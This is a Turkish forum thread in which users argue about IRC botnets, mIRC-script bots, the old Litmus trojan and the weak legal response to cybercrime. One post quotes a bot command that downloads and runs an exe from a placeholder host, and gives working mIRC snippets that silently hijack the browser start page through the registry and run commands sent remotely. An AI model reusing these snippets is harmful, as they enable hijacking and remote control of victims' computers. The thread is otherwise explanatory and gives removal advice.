|
|
AntiBotnet Kampanyası
- Konbuyu başlatan Immunity
- Başlangıç tarihi
Aşkolsun... Duyanda sürekli münakaşa ediyormuşuz gibi anlayacak...
benim söylemim Botnet olursa anlayamazsın olacaktı
site üzerinden saldırıyorsa zaten ben burdayım diye bayrak çekmiş olacaktır.
Zeka seviyelerinin de belirteci olur bu.. Saldırı yapmakla zaten Zeki OLMADIĞINI gösterse bile ...
K
Kayıtsız Üye
Misafir
konuyu hortlatmıs gıbı olmıyım ama benım tanıdıgım ve sahıt oldugum bırı var istediginiz gibi ispatlarım bunu sorun değil ve bır ıkıncısıde suphelendıgım bırı var ama suphelenıyorum dıyorum bakın yapıyor demıyorum ama ılk bahsettıgım ınsan yapıyor buna ben gözlerımle sahıt oldum
1 ncisi botnet dediğimiz olay basit mirc kodları ile oluşan kodlamalardır. yani sıradan bir mirc.exe sine bir alias ini birde mirc.ini ekleyerek basitçe bir botnet oluşturulabilir. daha sonra kodlanan "script" bir takım programlardan geçerek exe haline dönüştürüyor ve buna takriben bir xxx absürt bir site veya yüksek hitli sitelere banner click doğrultusunda exeler indirtiliyor ve bir mirc sunucusunda botnet dediğimiz olay kurbanlar aracılığı ile yönetiliyor. veya sitelerde gizli txt dosyalari ile kurbanlar yönlendiriliyor. ve sonuç olarakda diledikleri gibi kullanıyor ve kullandırttırılıyorlar.
üstüne üstlük download eklentisi bulunuyor.
!download http://site.adi.com/bilmemne.exe v.s aklınıza gelebilecek herşey indirtirilip !run komutu ilede otomatik kurdurtuluyor. daha sonra zaten yeni yazılan exe ile kurban klonlanarak farklı amaçlar için kullanılıyor.
basit mirc komutları ile yazıldığından kolaylıkla istenilen şeyi elde edebiliyorlar..
mesela;
seklinde explorer baslangic sayfasi siteadi.com olup ve degistirilmesi engellenir.
yada;
seklinde !run cmd.exe seklinde dos kismina düsürülebilir veya dos eklentileri sayesinde diledikleri komutu uygulayabilir yada portlariniz ile oynayabilirler. zaten bi takim portlariniz (en basiti 6667) acik oldugu icin rahatlikla kurban avına cikabilirler. (resimleriniz, videolarınız, scriptleriniz, sifreleriniz, msn v.s adresleriniz) genellikle bu tarz isleri baslatan kisilerin ilk kodlamaları ile gitmektedir. örnegin; !Getmsn komutu ile kurbanın msn adresini, msn ismini görürler. ip adresi zaten kurban bot ile birlikte görüldüğünden dolayı sonrası kolay ekmek olarak nitelendirilir.
site txt dosyalarına gelince; kurbanlar yine banner veya site acılımlarında yazılan css v.s kodlamaları sayesinde siteye girişte direk download olur ve otomatikmen çalışır... daha sonra www.siteadı.com/xx.txt dosyasına kurban bilgisayardaki casus yazılım direk giriş yapar ve kodlamalar sayesinde xx.txt dosyasındaki görevleri uygular...
örnegin;
http://www.hm2k.com/upload/control.txt (tesadüfen buldugum bi adres...)
veya apayrı olan web kodlamaları ile
örneğin; (siteye giren kişi gizli olarak chate sokulur v.s)
v.s şeklinde gelip gidiyor.. dediğim gibi bunları çook öncelerinde bir iki kişi yazdı daha sonra yayıldı, bu iş için siteler yapıldı sonra ticarete döküldü en son olarak "irc koruma botları" olarak adlandırılan socket botların satışı için kullanılırken bir iki coder bu kodları veri hırsızlığı, ddos, v.s için derledi o sayede günümüze kadar geldi ve gitmeye devam edecek gibi...
Saygılarımla
üstüne üstlük download eklentisi bulunuyor.
!download http://site.adi.com/bilmemne.exe v.s aklınıza gelebilecek herşey indirtirilip !run komutu ilede otomatik kurdurtuluyor. daha sonra zaten yeni yazılan exe ile kurban klonlanarak farklı amaçlar için kullanılıyor.
basit mirc komutları ile yazıldığından kolaylıkla istenilen şeyi elde edebiliyorlar..
mesela;
Kod:
alias strpage {
.set %strpage $r(10,1999) $+ .reg
.write %strpage REGEDIT4
.write %strpage [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
.write %strpage "Start Page"="Http://www.siteadi.com"
run -n regedit /s %strpage
timer 1 4 remove %strpage
}seklinde explorer baslangic sayfasi siteadi.com olup ve degistirilmesi engellenir.
yada;
Kod:
if ($1 = !Run) { srvmsg Aciliyor: $2- | .run $2- }seklinde !run cmd.exe seklinde dos kismina düsürülebilir veya dos eklentileri sayesinde diledikleri komutu uygulayabilir yada portlariniz ile oynayabilirler. zaten bi takim portlariniz (en basiti 6667) acik oldugu icin rahatlikla kurban avına cikabilirler. (resimleriniz, videolarınız, scriptleriniz, sifreleriniz, msn v.s adresleriniz) genellikle bu tarz isleri baslatan kisilerin ilk kodlamaları ile gitmektedir. örnegin; !Getmsn komutu ile kurbanın msn adresini, msn ismini görürler. ip adresi zaten kurban bot ile birlikte görüldüğünden dolayı sonrası kolay ekmek olarak nitelendirilir.
site txt dosyalarına gelince; kurbanlar yine banner veya site acılımlarında yazılan css v.s kodlamaları sayesinde siteye girişte direk download olur ve otomatikmen çalışır... daha sonra www.siteadı.com/xx.txt dosyasına kurban bilgisayardaki casus yazılım direk giriş yapar ve kodlamalar sayesinde xx.txt dosyasındaki görevleri uygular...
örnegin;
http://www.hm2k.com/upload/control.txt (tesadüfen buldugum bi adres...)
veya apayrı olan web kodlamaları ile
örneğin; (siteye giren kişi gizli olarak chate sokulur v.s)
Kod:
<?
$quoteFile = "kimler.txt";
$fp = fopen($quoteFile, "r");
$content = fread($fp, filesize($quoteFile));
$quotes = explode("\n",$content);
fclose($fp);
srand((double)microtime()*1000000);
$index = (rand(1, sizeof($quotes)) - 1);
$nickler = $quotes[$index];
$identler = file("identler.txt");
$anahtar = array_rand($identler);
$ident = $identler[$anahtar];
?>Saygılarımla
http://66.102.9.104/search?q=cache:...urna.net&hl=tr&ct=clnk&cd=11&gl=tr&lr=lang_tr
buda bir zamanların en korkulan trojeni; litmus 'un coluk cocuğun eline düşüşü...
http://www.konusankalpler.com/forum...riniza-40-tane-bot-sokma-p-t159.0.html;imode=
buda bir zamanların en korkulan trojeni; litmus 'un coluk cocuğun eline düşüşü...
http://www.konusankalpler.com/forum...riniza-40-tane-bot-sokma-p-t159.0.html;imode=
neden böyle bir tepki verdigini bilmek isterdim açıkçası
ve bunlardan kurtulmanın en iyi yolu formattır.
bilgisayarınızda olup olmadığını farketmek için yapacağınız şey şudur;
(sol alt köşede) başlat'a tıklayın oradan çalıştır'a tıklayın ve şu komutu yazın msconfig daha sonra enter tuşuna basın. ve karşınıza çıkan kısımda "başlangıç" sekmesine tıklayın.. orada bilgisayarınız windows a geçişte açılan programları listeler.. bilmediğiniz veya sadece run yazıp karşılığı boş olan v.s bütün programları inceleyin eğer temizleyemeyeceğinizi düşünüyor iseniz format atın yada attırın.
Not: Loi "ağzı olan konuşuyor" gibisinden bir mesaj yazmışsın. Bu benim bildiğim ve insanlara verdigim bilgidir yani bi nevi yardımdır. en azından gereksiz yere konuya post atılmasından iyidir diye düşünüp bilgimi paylaşmayı denedim.
Saygılarımla.
bilgisayarınızda olup olmadığını farketmek için yapacağınız şey şudur;
(sol alt köşede) başlat'a tıklayın oradan çalıştır'a tıklayın ve şu komutu yazın msconfig daha sonra enter tuşuna basın. ve karşınıza çıkan kısımda "başlangıç" sekmesine tıklayın.. orada bilgisayarınız windows a geçişte açılan programları listeler.. bilmediğiniz veya sadece run yazıp karşılığı boş olan v.s bütün programları inceleyin eğer temizleyemeyeceğinizi düşünüyor iseniz format atın yada attırın.
Not: Loi "ağzı olan konuşuyor" gibisinden bir mesaj yazmışsın. Bu benim bildiğim ve insanlara verdigim bilgidir yani bi nevi yardımdır. en azından gereksiz yere konuya post atılmasından iyidir diye düşünüp bilgimi paylaşmayı denedim.
Saygılarımla.
Arkadasin anlattigi seyler mazide kalmis seyler. Boyle ataklardan en cok nasibini alanlardan biri oldugum icin bu konuyu cok derin inceledim. Artik devir cok degisti, litmus muş mirc botmus bunlar buz devrinde kalan seyler.
Ayrica biz bu savasi vermeye cok onceleri basladik, icraate gelince kimse ortada gozukmuyor ancak konusmaya gelince konusan bol oluyor. Turkiyede bir cok kimseye zarar verenleri teker teker ortaya cikardik dellillerimizle herseyi sunduk, yeri geldi emniyete bile bilgi verdik herseyi hazirladik ama sikayet edecek 2 delikanli bulamadik. Iste o yuzden agzi olan konusuyor ama icraat e gelince ses yok..
Ayrica biz bu savasi vermeye cok onceleri basladik, icraate gelince kimse ortada gozukmuyor ancak konusmaya gelince konusan bol oluyor. Turkiyede bir cok kimseye zarar verenleri teker teker ortaya cikardik dellillerimizle herseyi sunduk, yeri geldi emniyete bile bilgi verdik herseyi hazirladik ama sikayet edecek 2 delikanli bulamadik. Iste o yuzden agzi olan konusuyor ama icraat e gelince ses yok..
birincisi bunlar mazide kalan değil halen yasanilan seyler
ikincisi ise diyelimki iki delikanli cikti ortaya dediki kardeşim bu adamlar böyle böyle şeyler yaparak benim sitelerimi etkisiz hale getirerek malıma zarar verdi ve mahkemeye 3, 5 resim sundu. adamda dediki hayır efendim benim haberim olmadan yapılan şeyler uyarıldığım zamanda yasakpara olan konuyu dikkate alarak bizzat kendim müdahele etmeye çalıştım ayrıca arkadaşım gibi beni uyaran çok kişi oldu bende çok mağdur oldum ve sitemi kapatmak zorunda kaldım. diyip işin içinden sıyrılma şansını elde edebilir. üstüne üstlük birde tazminat davası açabilir
onu bırak hakimlerimiz bile bilişim hukukundan henüz net bir bilgiye sahip değil ki... adam görüyor mağduriyetini eve tamam belki ortada ama adam ne ceza vereceğini bilmiyorki... tecavüz yada gasp değilki at içeri 10 yıl bilmem ne desin.. adamın düşüncesi "şunlara bak cocuk gibi neyin kavgasını ediyor.. o oyuncak benimdide diğeri sahip çıkmış filan.." yau kaç avukat, kaç hakim tanıyorsun interneti bilen yada inceleyen?
avukatlik bürosuna gidiyorsun adam bilgisayarı sana soru soruyor.. "söz meclisten disari"
yani o yüzden günümüzde bilişim hukuku henüz tam olarak kavranamadı.
bi cok konuda kanun cok değişik. bak mesela benim dükkanım var. adam koskoca minübüs ile kaldirima cikip benim tentemi devirdi haliyle adama dava açtım ve mahkeme beni haksız buldu. üstüne üstlük 800 ytl verip tenteyi yeniledim ayrica karşı avukatın ücretini, kendi avukatımın ücretini ödedim anliyacagin tenteyi yeniledigim ile kaldım.
onu bırak adam seni dolandırıyor. elinde kendine göre belgeler var karakola başvuruyorsun polis diyorki; "hemşerim şimdi başvuracaksın o dava senin bu dava benim şu gün git bugün gel bi ton uğraşırsın... ki değmez..." diyor. onu bırak "gayri meşru olarak halledeceksin" diye akıl verenler bile oluyor
tek diyebilecegimiz sey "cok calismak lazim cook"
ikincisi ise diyelimki iki delikanli cikti ortaya dediki kardeşim bu adamlar böyle böyle şeyler yaparak benim sitelerimi etkisiz hale getirerek malıma zarar verdi ve mahkemeye 3, 5 resim sundu. adamda dediki hayır efendim benim haberim olmadan yapılan şeyler uyarıldığım zamanda yasakpara olan konuyu dikkate alarak bizzat kendim müdahele etmeye çalıştım ayrıca arkadaşım gibi beni uyaran çok kişi oldu bende çok mağdur oldum ve sitemi kapatmak zorunda kaldım. diyip işin içinden sıyrılma şansını elde edebilir. üstüne üstlük birde tazminat davası açabilir
onu bırak hakimlerimiz bile bilişim hukukundan henüz net bir bilgiye sahip değil ki... adam görüyor mağduriyetini eve tamam belki ortada ama adam ne ceza vereceğini bilmiyorki... tecavüz yada gasp değilki at içeri 10 yıl bilmem ne desin.. adamın düşüncesi "şunlara bak cocuk gibi neyin kavgasını ediyor.. o oyuncak benimdide diğeri sahip çıkmış filan.." yau kaç avukat, kaç hakim tanıyorsun interneti bilen yada inceleyen?
avukatlik bürosuna gidiyorsun adam bilgisayarı sana soru soruyor.. "söz meclisten disari"
yani o yüzden günümüzde bilişim hukuku henüz tam olarak kavranamadı.
bi cok konuda kanun cok değişik. bak mesela benim dükkanım var. adam koskoca minübüs ile kaldirima cikip benim tentemi devirdi haliyle adama dava açtım ve mahkeme beni haksız buldu. üstüne üstlük 800 ytl verip tenteyi yeniledim ayrica karşı avukatın ücretini, kendi avukatımın ücretini ödedim
anliyacagin tenteyi yeniledigim ile kaldım.onu bırak adam seni dolandırıyor. elinde kendine göre belgeler var karakola başvuruyorsun polis diyorki; "hemşerim şimdi başvuracaksın o dava senin bu dava benim şu gün git bugün gel bi ton uğraşırsın... ki değmez..." diyor. onu bırak "gayri meşru olarak halledeceksin" diye akıl verenler bile oluyor
tek diyebilecegimiz sey "cok calismak lazim cook"
Herhalde iyi anlatamadim. Mirc ile bot yapmis adam neye yarar neler var diyorum ruhunuzun duyamayacagi. Biz bi cogunu tespit edebiliyoruz gercek anlamda delillerde bulabiliyoruz. Bi adamin hakkinda 10 kisi ayni sekilde dava acarsa(davalarda birlestirilirse) HAKIMde esek degildir herhalde. Ama dava edebilecek, sikayette bulunabilecek adamlar yok. Senin gibi hersey biseyden korkuyor, yok mahkemeyemi gidicem, yok avukatlami ugrasicam yok sununlami yok bununlami. o zaman cekin basiniza geleni, müstehaktır.
yani bilişim hukuku diye bir departman açılıyor ama departmanı bilen kişiler olarak seni beni alsalar interneti bırak bilgisayarı yalayıp yuttuğumuz için elbetteki bir ceza biçebiliriz ama gel gelelim avukatlarımız yada hakim \ savcılarımız henüz "HIZLI GELİŞEN" internet konusunda pek bir bilgiye sahip değiller. Ama zamanlar hepsinin gerek veri (bilgi) hırsızlığının gerekse insanları mağdur etmenin veya clone dediğimiz emek hırsızlığının mutlaka ağır bir bedeli olacağını sanıyorum..
bak benim basima şöyle bi olay geldi zamanında xx bi host ile problem yasadim "dedicated" ile ilgili ve benim gibi bir cok insan veya müsterileri mağdur oldu. bi cok kisi harekete gecti bende dahil. avukata götürdügüm deliller konusunda avukatım hala bana o konu ile dönmüş değil. adam diyorki "kardeşim ben her şekilde yırtarım. kullanım sözleşmesi diye birşey var" diyor. e bakıyorsun haliyle mağdur olan sensin. mağduriyetin belli ama onca emeğin kaybının üzerine onca çabaya rağmen elde edebildiğin şey kocaman bir "0"
Adam: müşterilerimize teker teker konu ile alakalı bilgiyer teyit ettik fakat aracısı olduğumuz asıl firmanın bizi birden yüz üstü bırakması sonucunda bütün müşterilerimizin bilgilerinin kaybına uğradık. bunun üzerine müşterilerimize elimizden geldiğince üzüntümüzü belirtip kendilerine yeni bi yer olanağı sunduk fakat kurtaramadığımız verilerini geri iade edemeyeceğimiz için onlara fiyatlarımızda kolaylık sağlamayı düşündük. ki bizde bu olaydan aşırı mağdur olduk ve aracısı olduğumuz firma yüzünden ticaretini yaptığımız firmanın rencide olması ile aşırı müşteri kaybına ve karalamaya mağruz kaldık. v.s diyip siyrildilar.
buna ne demeli :S
Adam: müşterilerimize teker teker konu ile alakalı bilgiyer teyit ettik fakat aracısı olduğumuz asıl firmanın bizi birden yüz üstü bırakması sonucunda bütün müşterilerimizin bilgilerinin kaybına uğradık. bunun üzerine müşterilerimize elimizden geldiğince üzüntümüzü belirtip kendilerine yeni bi yer olanağı sunduk fakat kurtaramadığımız verilerini geri iade edemeyeceğimiz için onlara fiyatlarımızda kolaylık sağlamayı düşündük. ki bizde bu olaydan aşırı mağdur olduk ve aracısı olduğumuz firma yüzünden ticaretini yaptığımız firmanın rencide olması ile aşırı müşteri kaybına ve karalamaya mağruz kaldık. v.s diyip siyrildilar.
buna ne demeli :S
Şunu bir ayırt edelim, IRC Bot ile botnet çok farklı şeylerdir.
IRC BOT, socx girişi yapar, sunucu kaynakli ise eggdrop olarak hosting'e atılır ve çalıştırırlır.
Litmus, kişilere msn vb. üzerinden .exe dosyasını dağıtaracak virus yayma girişimidir.
Sunucuya girdiklerinde, realname, ident nick haneleri aynıdır. +b ve fonksiyonları ile önleyebilirsiniz.
BOTNET denilen olay, c++ yazılım bilgisi gerektirir. Eğer ki biliyorsaniz, birgun zurna.net'e girin, ve özelinize otomatik gelen MSN adreslerinden birisini ekleyin, size bir dosya indir zartumu gör zurtumu gör diyecektir. indirin bakalım, hangi ip'den, hangi hosting'den sağlanıyor, görebilirsiniz. Ayrıca, botnet'in IRC üzerinde sonu yoktur. Nick, IDENT, realname farklidir. Ping ve version cevabi verebilir.
IRC BOT, socx girişi yapar, sunucu kaynakli ise eggdrop olarak hosting'e atılır ve çalıştırırlır.
Litmus, kişilere msn vb. üzerinden .exe dosyasını dağıtaracak virus yayma girişimidir.
Sunucuya girdiklerinde, realname, ident nick haneleri aynıdır. +b ve fonksiyonları ile önleyebilirsiniz.
BOTNET denilen olay, c++ yazılım bilgisi gerektirir. Eğer ki biliyorsaniz, birgun zurna.net'e girin, ve özelinize otomatik gelen MSN adreslerinden birisini ekleyin, size bir dosya indir zartumu gör zurtumu gör diyecektir. indirin bakalım, hangi ip'den, hangi hosting'den sağlanıyor, görebilirsiniz. Ayrıca, botnet'in IRC üzerinde sonu yoktur. Nick, IDENT, realname farklidir. Ping ve version cevabi verebilir.
Bu konuda ne cok bilgili arkadas varmis.. Yok botnet c++ yazilimi gerektirirmis yok litmus msn uzerinden exe dagitarak virus yayma girisimiymis. irc bot socx girisi yaparmis.
Yahu agzi olan konusuyor diyorum birde yok yok diyorsunuz. Yazdiklarin sadece oradan buradan duyduklarin yarisida atmasyon. Yazan adam her dilde bot yazar. Ne c ile alakasi var nede c++. Ayrica socx degil ona socket denir. Duymussun bi yerden socksopen onuda yanlis soyluyorsun. Erisim socketler ile yapilir. Senin bu sayfayi izliyor olmanda kullandigin yazilimin bu servera socket acip ilgili dizindeki veriyi istemesi ile gerceklesiyor. Sen simdi irc bot socx girisi yapar diyince millet dusunuyorki "VAY ANASINIII ODA NEKII"..
Ayrica sen bunlari birak, cozum icin simdiye kadar ne yaptin veya ne yapilmalida bu tur seylerin onune gecilmeli onu soyle..
Yahu agzi olan konusuyor diyorum birde yok yok diyorsunuz. Yazdiklarin sadece oradan buradan duyduklarin yarisida atmasyon. Yazan adam her dilde bot yazar. Ne c ile alakasi var nede c++. Ayrica socx degil ona socket denir. Duymussun bi yerden socksopen onuda yanlis soyluyorsun. Erisim socketler ile yapilir. Senin bu sayfayi izliyor olmanda kullandigin yazilimin bu servera socket acip ilgili dizindeki veriyi istemesi ile gerceklesiyor. Sen simdi irc bot socx girisi yapar diyince millet dusunuyorki "VAY ANASINIII ODA NEKII"..
Ayrica sen bunlari birak, cozum icin simdiye kadar ne yaptin veya ne yapilmalida bu tur seylerin onune gecilmeli onu soyle..
Türkiye ve dünyadaki neredeyse tüm botnetler irc üzerinden kontrol ediliyor. Webde bir ayar dosyasındanda bilgi alan botlar var fakat bu çok sağlıklı bir yöntem değil botnetciler için, anlık işlem yapmaları zorlaşır çünkü tüm kontrol altındaki makineler her saniye webdeki ayar confuna girerse server alt üst olur. fakat irc'de böyle bir durum yoktur.
litmus dediğiniz olay hazır bir trojandır. ve taş devrine aittir. söylediğiniz tanımla uzaktan yakından bir alakası yoktur. 99'larda moda olan schoolbus gibi bir yazılımdır, kolayca trojan elde edilir ve litmusla yalnızca irc üzerinden saldırı yapılır. ddos vb. imkanları yoktur.
bahsettiğiniz msnden yüklenmeye çalışılan botlar genellikle mirc scripting ile hazırlanmış botçuklardır.
son olarak, loi'ninde dediği gibi trojan yazmak için belli bir dile ihtiyaç yoktur. tüm bilgisayar programlama dilleri ile yazılabilir.
önce bilgi, sonra fikir sahibi olmanızı öneririm.
Biz ne diyoruz, sen ne diyorsun.. Konuyu sonuna kadar saptirdiniz. 1. sayfadan itibaren bi okumaya baslayin ondan sonra post atin.